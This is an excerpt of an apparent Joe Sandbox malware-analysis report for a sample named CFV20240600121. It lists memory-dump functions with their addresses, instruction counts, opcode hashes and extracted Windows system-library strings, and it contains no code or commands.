                                        • API String ID: 0-4066393604
                                        • Opcode ID: a1eac9ab1c0a9a7f6f606956dcb108a6bf10576c8a5df316ba08902db224f79f
                                        • Instruction ID: 41035bea5c22e9ace3bb683dd101ec69408365b1e1144b38140014afb8c7d1f2
                                        • Opcode Fuzzy Hash: a1eac9ab1c0a9a7f6f606956dcb108a6bf10576c8a5df316ba08902db224f79f
                                        • Instruction Fuzzy Hash: 20E1A372E002199FEF21CF99DA80BAEBBB9FF48318F14052AE901E7261D774D941CB51
                                        Function 0149A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `$`
                                        • API String ID: 0-197956300
                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                        • Instruction ID: 037be614591be1b630e5c9db73ba27d55116e02d643c1898828cb7f618c656c0
                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                        • Instruction Fuzzy Hash: FDC1B3312043469BEB25CF29C845B6BBFE5AFD4318F284A2EF695C72A0D774D905CB81
                                        Function 0144E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Legacy$UEFI
                                        • API String ID: 2994545307-634100481
                                        • Opcode ID: 469bc900b9aada007cb205c6cb86e74482fa983af52022b53c25a153e0182670
                                        • Instruction ID: 4d70efaa569938f1858fe380b36682abe2969a7bade14fc6cadb54fb38fe56ed
                                        • Opcode Fuzzy Hash: 469bc900b9aada007cb205c6cb86e74482fa983af52022b53c25a153e0182670
                                        • Instruction Fuzzy Hash: E7616D71E002199FFB14DFA9C840BAEBBB9FB54704F14406EE649EB2A1D735E901CB50
                                        Function 014743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$MUI
                                        • API String ID: 0-17815947
                                        • Opcode ID: b68698e99c4f275e9482f29abef08d63ce21bb160b149722f25eed3295adbca3
                                        • Instruction ID: 2cbd5c919ffe51610f705a6f29b128e7dfa55718afbdb2aaddc1815883bb3470
                                        • Opcode Fuzzy Hash: b68698e99c4f275e9482f29abef08d63ce21bb160b149722f25eed3295adbca3
                                        • Instruction Fuzzy Hash: 8E5106B1E0021DAEDF11DFA9CD90EEFBBB8EB54754F14052AE611B72A0D7709A05CB60
                                        Function 013D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        • kLsE, xrefs: 013D0540
                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013D063D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                        • API String ID: 0-2547482624
                                        • Opcode ID: 36b90777a0ad4ed5a8fec68651f875f19ebb321471dc951807d384d18bbbf1fd
                                        • Instruction ID: ecb433b93c08dfdb34ea8658f5a7b2371dd1b86e58c4ee7cb1dcd9c90cb9e7e8
                                        • Opcode Fuzzy Hash: 36b90777a0ad4ed5a8fec68651f875f19ebb321471dc951807d384d18bbbf1fd
                                        • Instruction Fuzzy Hash: 7951C0725047428FD728DF68D4406A7BBE4EF84B18F10483EFAE987241E770D545CB92
                                        Function 013DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                        Download Yara Rule
                                        Strings
                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 013DA2FB
                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 013DA309
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                        • API String ID: 0-2876891731
                                        • Opcode ID: 637913d2417868599f961baf76b367e6f5d372ce410ce7b72db32b211105573e
                                        • Instruction ID: 12e1065ee562f68622b960f03442e414a6f39dd2ebe38028bd69be1667e10554
                                        • Opcode Fuzzy Hash: 637913d2417868599f961baf76b367e6f5d372ce410ce7b72db32b211105573e
                                        • Instruction Fuzzy Hash: 6A41DE32A04659DBDB15CF5DD940B6E7BB5FF89308F2440AAE900DB7A1EBB5D900CB50
                                        Function 0140A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: Cleanup Group$Threadpool!
                                        • API String ID: 2994545307-4008356553
                                        • Opcode ID: 50eeb96a403db0983f8c5fcd970de7503e68b0b801c937818d274c1443c7ccd8
                                        • Instruction ID: c5a7c8f52610cb3853f34cea278cf4fb3c764a7d076b414b06d5964eadc1fea1
                                        • Opcode Fuzzy Hash: 50eeb96a403db0983f8c5fcd970de7503e68b0b801c937818d274c1443c7ccd8
                                        • Instruction Fuzzy Hash: AD01ADB2240700AFD312DF25CD45B2677F8E795719F05893EA68CCB2A0E374D805CB46
                                        Function 013DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: MUI
                                        • API String ID: 0-1339004836
                                        • Opcode ID: f8a42a69a6f40d33b64d3110761104adf38ec8cf11d550d2b1146bc458fa1da9
                                        • Instruction ID: 6437b2d897ea2424cd6f7c6480a2a2522f2b62311504f2d234b747e998bd17f4
                                        • Opcode Fuzzy Hash: f8a42a69a6f40d33b64d3110761104adf38ec8cf11d550d2b1146bc458fa1da9
                                        • Instruction Fuzzy Hash: DD827D76E102188FEB25CFA9D880BEDBBB5BF44318F148169E919AB391DB309D45CF50
                                        Function 01456420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 27c9320f4abf5b890080458933d87c668eeaf72be3b57a6c1e3c88db2a57fbed
                                        • Instruction ID: d41354ff1cc3663d3ffcc3b92defe13b4326ecee38836b038473fb1eeebc1ff7
                                        • Opcode Fuzzy Hash: 27c9320f4abf5b890080458933d87c668eeaf72be3b57a6c1e3c88db2a57fbed
                                        • Instruction Fuzzy Hash: 1A919471940219AFEB21DF99CC85FAE7BB8EF14754F51005AFB04AB2A1D774AD04CBA0
                                        Function 0147E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 5f7635ba047cad07eac138aea1a95978b4b1b667869e4cf9fd5ad199948d6ec4
                                        • Instruction ID: 0c11c7d47187785669680e87b31a38e4de5cf2aa28bd639f45bd4b70831c0b62
                                        • Opcode Fuzzy Hash: 5f7635ba047cad07eac138aea1a95978b4b1b667869e4cf9fd5ad199948d6ec4
                                        • Instruction Fuzzy Hash: 0E91A071900609BEDB22AFA5DC44FEFBBB9EF55744F14016AF605B7260DB349902CB90
                                        Function 0140A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GlobalTags
                                        • API String ID: 0-1106856819
                                        • Opcode ID: 059827b16d806ddae3ada7956bf6acbc4f9feb2bb5ab564ca6a35f655e1825a0
                                        • Instruction ID: 4ca1515aeab03940e0ab39e922e01f81debc099ddc340061b7ea4feac13dd436
                                        • Opcode Fuzzy Hash: 059827b16d806ddae3ada7956bf6acbc4f9feb2bb5ab564ca6a35f655e1825a0
                                        • Instruction Fuzzy Hash: 21718CB5E0120A8FEF28CF9DD5906AEBBB1BF59710F15812FE905A7361EB308841CB50
                                        Function 01474978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .mui
                                        • API String ID: 0-1199573805
                                        • Opcode ID: e4a7fb58114fec77bf0bb50d6e62cb59dedbe745f3d45db0888d60dc97d31971
                                        • Instruction ID: ab5f2865609b58c7d1e6888963d04aef5b1c6eea3f308d4a7a41491db6a916a1
                                        • Opcode Fuzzy Hash: e4a7fb58114fec77bf0bb50d6e62cb59dedbe745f3d45db0888d60dc97d31971
                                        • Instruction Fuzzy Hash: 5A517572D0022A9BDF11DFA9D840AFEBBB8EF14654F09416BE911BB360D7349D01CBA4
                                        Function 013EE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: EXT-
                                        • API String ID: 0-1948896318
                                        • Opcode ID: 0fde0df2ea12c49e267f0d322b208196c26db12ce471c3ee27f6450ed4cb6d27
                                        • Instruction ID: 623fa8520f055eb81f36c7e291124d4b37073311638c07674146ba32c13fa6a3
                                        • Opcode Fuzzy Hash: 0fde0df2ea12c49e267f0d322b208196c26db12ce471c3ee27f6450ed4cb6d27
                                        • Instruction Fuzzy Hash: B84192725483229BD710DA79D848B6BBBD8AF8871CF44093DF684D72D0E674D904C796
                                        Function 0144C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        • Opcode ID: fd9390099cc3d0408f7ac23d3fdd1d9e8d45ec3746cdb8e9154fd7ce653cdf13
                                        • Instruction ID: 392452f53a8a4ab663e2274c1643ecdb93383a59e53ac26bbf4e0cf2feae8d12
                                        • Opcode Fuzzy Hash: fd9390099cc3d0408f7ac23d3fdd1d9e8d45ec3746cdb8e9154fd7ce653cdf13
                                        • Instruction Fuzzy Hash: E44136F1D0112DABEB21DA51CC84FDEB77CAB54714F0445AAEB08AB160DB709E89CF94
                                        Function 01466B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: 14fa21b1a8a7c21ff2ba7a4d63faad87df41a6342004380d5f9b064d334f5dbe
                                        • Instruction ID: 2cbe7738c27f16727b9ec58e1c67d8085dd5f1b6cc3ab588c9efac5a661e91d5
                                        • Opcode Fuzzy Hash: 14fa21b1a8a7c21ff2ba7a4d63faad87df41a6342004380d5f9b064d334f5dbe
                                        • Instruction Fuzzy Hash: 53311831A00B199AEB32CB6DC850BAE7BACDF4470CF15406AE941AB2A6D775DC05CB51
                                        Function 0144CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        • Opcode ID: 8531b144e86f86ea3ab30f5bffd0dbb2051632957cf82801eb62a49ab3dde7d2
                                        • Instruction ID: ef6cea3c407b3a9b8fc55f990d229a99fc3af253e37843a39ae664d3d0b8a265
                                        • Opcode Fuzzy Hash: 8531b144e86f86ea3ab30f5bffd0dbb2051632957cf82801eb62a49ab3dde7d2
                                        • Instruction Fuzzy Hash: 2B314736902555AFFB15CB49D885E7FBB74EF80714F05402AE905A7260D7309E00D7E0
                                        Function 0145892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        Strings
                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0145895E
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                        • API String ID: 0-702105204
                                        • Opcode ID: a693b9cac7aa04ca0d7d8f89759a31ca1093e6039352fe0688bf9c4bc2e9bbfc
                                        • Instruction ID: 29f403bf934c63c856dc08d50d8eb5e286871229012846be12c971fe63d2eb44
                                        • Opcode Fuzzy Hash: a693b9cac7aa04ca0d7d8f89759a31ca1093e6039352fe0688bf9c4bc2e9bbfc
                                        • Instruction Fuzzy Hash: 670188363002129FE7A55B5BDC84A6A7FB5EF95654B04042EEA4116673CF306841CB96
                                        Function 01472000 Relevance: .8, Instructions: 757COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6d381244fa4e73039155facc40a06b328ceb902c3ed14a8a116b69382b484bed
                                        • Instruction ID: ed5ac06163e96e9ee814e454cd6d0642fc1613fa557443bb557a99c31d054df0
                                        • Opcode Fuzzy Hash: 6d381244fa4e73039155facc40a06b328ceb902c3ed14a8a116b69382b484bed
                                        • Instruction Fuzzy Hash: 5942D1316083419BD725CF69C890EABBBE5BF98304F09092FFA8697360D7B1D945CB52
                                        Function 01468158 Relevance: .6, Instructions: 617COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af89098b95a7fd99f51ee81a424ded303f54008f5e05309e85aff0152ffc01c7
                                        • Instruction ID: a1f725893868273f59702633048eddeeaee0f9a545b47188422bf9b512d41b0f
                                        • Opcode Fuzzy Hash: af89098b95a7fd99f51ee81a424ded303f54008f5e05309e85aff0152ffc01c7
                                        • Instruction Fuzzy Hash: 0A423D75A0031A8FEB24CF69C841BAEBBF9BF48304F14819AE949AB251D7349D85CF51
                                        Function 013E2840 Relevance: .6, Instructions: 605COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ca942f7b09bdfbb550ae93b322aa5e9745ce6b9f01d30514f37c5fa5544c72d
                                        • Instruction ID: cea48a30e3f05f2f3d51f5618b7d7f24b3c2dd22a1a766028ce5e2f78f3b3a12
                                        • Opcode Fuzzy Hash: 4ca942f7b09bdfbb550ae93b322aa5e9745ce6b9f01d30514f37c5fa5544c72d
                                        • Instruction Fuzzy Hash: 3332E270A00756AFDB25CF69C8447BEBBF6BF88304F25412ED54A9B3A4D735A902CB50
                                        Function 0147A118 Relevance: .6, Instructions: 591COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                                        • Instruction ID: abb97485367c778edfa0917b2a4674aaf0e62a42c41cfc00a626c8c13bdfa3ad
                                        • Opcode Fuzzy Hash: 68902b2e8babb8efe5300657a219f235f16d73d491f5dcbac566421b73f27773
                                        • Instruction Fuzzy Hash: DA22B0702046618BEB25CF2DC0947BABBF1AF44304F2C845BE9868F3A6D775E452CB61
                                        Function 013D6A50 Relevance: .5, Instructions: 548COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e8af847e05ee4867e658f7fbc0ac15aa0831e9e1ce5983af76f989902125cb6
                                        • Instruction ID: dec1dcf5b890ddba0dbbe4a48634e68f1e6996e22150a786b3b1207d65dcaf32
                                        • Opcode Fuzzy Hash: 4e8af847e05ee4867e658f7fbc0ac15aa0831e9e1ce5983af76f989902125cb6
                                        • Instruction Fuzzy Hash: B132C0B1A00205CFDB25CF69D480BAEB7F5FF98304F14856AE966AB7A1D734E841CB50
                                        Function 013F4A35 Relevance: .4, Instructions: 423COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction ID: ad718c5bea3ab8799d227b79635eba62b0668e3e3da51759e0baeda157d5160f
                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction Fuzzy Hash: 3CF13B71E0021A9BDF15CF99D580BAFBBF5AF48718F08812EEA45AB351E774D841CB60
                                        Function 0146892B Relevance: .4, Instructions: 386COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91acaf92de3572696e591e8657a4ae6291ef86371e78011319bff8dad64cbabd
                                        • Instruction ID: 3a93d945da2f7131a4c56b951905f07172f5b0a49465dd6615407746e902a2d5
                                        • Opcode Fuzzy Hash: 91acaf92de3572696e591e8657a4ae6291ef86371e78011319bff8dad64cbabd
                                        • Instruction Fuzzy Hash: C5D11171A0070B8BDF05CF69C840AFFB7F9AF88308F18816AD955A7251E735E906CB61
                                        Function 013D65D0 Relevance: .4, Instructions: 383COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                                        • Instruction ID: 19f5060f0e1fe7d4debda78987a46df79acab9865334696c43266a7475c7b148
                                        • Opcode Fuzzy Hash: 0bdf70f276ea6619fd57e14dadb04dd368a6d4659306df147d2b5e7cb0697f55
                                        • Instruction Fuzzy Hash: 80E1B0B2508346CFC715CF28D490A6ABBE0FF88318F05896DF9A587351DB31E905CB92
                                        Function 013C8397 Relevance: .4, Instructions: 380COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                                        • Instruction ID: fec576cf09ce1a5fddf635e24d411b11e1aa1aa4e23b6b0a44fbe84838f6dc09
                                        • Opcode Fuzzy Hash: 7d36ee3b6c93a71731411511fb7ed8e945438556613fdceec330bd208cf7c27a
                                        • Instruction Fuzzy Hash: EAD1F571A0021ADBDB14DF29C880ABBBBA5FF54B18F04456EE915DB290F734EE91CB50
                                        Function 01458243 Relevance: .3, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction ID: 2a6b85de1b568a34fcb49162eec193dc4e04ed9b70d4064de06363497abe30e0
                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction Fuzzy Hash: 33B1A674A00606AFDB64DF56C940EABBFB5FF54344F10442EAE41977A2DE30E906CB10
                                        Function 013E0535 Relevance: .3, Instructions: 300COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction ID: 91cc87dae1b65d8daf7f1516b36b0108610b4e9d37fb3f3d5b69112109e71a39
                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction Fuzzy Hash: 87B1443170475A9FDB15DBA8C854BBFBBFAAF88204F28015AE1529B3D1D770E941CB90
                                        Function 013D83C0 Relevance: .3, Instructions: 281COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                                        • Instruction ID: 1a297072bd00296750c3813f81519fc83a026571854281a817e66020abccc1c7
                                        • Opcode Fuzzy Hash: ff7927de9101e5103713112a51cbf2eda115cf7ccccdea2fcea250b63c89a3c7
                                        • Instruction Fuzzy Hash: 44C15675108341CFE764CF19C484BABBBE5BF98708F44496EE989873A1D774E908CB92
                                        Function 013CC427 Relevance: .3, Instructions: 280COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                                        • Instruction ID: a38f95a99e2443f3c31b10bc25c9e8459b535934f5d84f788900c51c7f145666
                                        • Opcode Fuzzy Hash: f3d0f11ec4f60f0ac17a90ed3d63a067e06b649533288b96dfa180489d1d1790
                                        • Instruction Fuzzy Hash: C3B19270A002668BDB24CF69C890BA9B3B5EF54714F1485EED50EE7651EB34DDC5CB20
                                        Function 013FE5E7 Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                                        • Instruction ID: 101b5af0980fc9798ffa5cbf4446851607b62318020347acdae68a6c6fd97c96
                                        • Opcode Fuzzy Hash: 971b3b478a4a20798d1bd4792f59ef7d099f98872e7a41ba07fede187e0304e0
                                        • Instruction Fuzzy Hash: ACA10731E006599FEB21DB5CC844FAEBBA4BB44718F16013AEB10AB2B1D7749D45CB92
                                        Function 01410185 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
                                        • Instruction ID: 4f2d1201004ea77a5eb7027a56e324a8f49960bc25ec1589969306a730f4746e
                                        • Opcode Fuzzy Hash: 4674d3292567313c92646e5d6da1a6cbd019b299455bf597246ae4f0a0bfc553
